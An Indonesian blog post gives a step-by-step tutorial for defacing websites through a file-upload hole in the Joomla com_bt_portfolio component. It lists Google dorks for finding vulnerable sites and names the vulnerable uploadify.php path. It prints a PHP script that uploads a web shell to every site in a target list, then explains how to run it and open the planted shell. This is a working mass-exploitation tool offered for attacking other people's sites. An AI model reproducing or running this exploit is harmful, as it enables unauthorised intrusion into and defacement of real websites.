Rabu, 16 November 2016

tutorial deface com bt portfolio

bahan bahan:
- PC yang tersambung dengan Internet
- Xampp
- Shell & Script Deface


1. Search di google dgn dork:
Dork:
inurl:/index.php?option=com_bt_portfolio
inurl:/bt_portfolio
(Kembangin lg biar dpt banyak web yg vuln and verawan kak)



2. Pilih salah satu web target, dan masukan exploit:
/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php

3. Vuln = Blank
4).Buat File Baru Berekstensi .php Contoh ferdiganteng.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php
Masukan Script Berikut Edit-Edit Dikit dan taruh juga shell sobat di directory yang sama dgn ferdiganteng.php tadi

  <?php


$get=file_get_contents($argv[1]);
$j=explode("\r\n",$get);
foreach($j as $site){
echo "\n\n\t[+] Uploading file to : ".$site;

$uploadfile="shell.php";
$ch =curl_init("trget/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",'folder'=>"/"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);{
print "\n\n\n$postResult";
echo "\n\n\t";
}
}
?>


4. Buka Xampp kalian yang sudah terinstall, nyalakan apace sama mysql nya
5. Buka CMD dan ketikan perintah
cd C:/xampp/php
php namaexploitlo.php

6. jika sukses , akan muncul nama shell sobat di CMD
7.akses shell? target/shellkamu.php
./Mr.greetz69 - PhantomGhost

./Mr.greetz69

Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation.

0 komentar:

Posting Komentar

 

Copyright @ 2013 BerdendangC0de.

Designed by Templateiy & CollegeTalks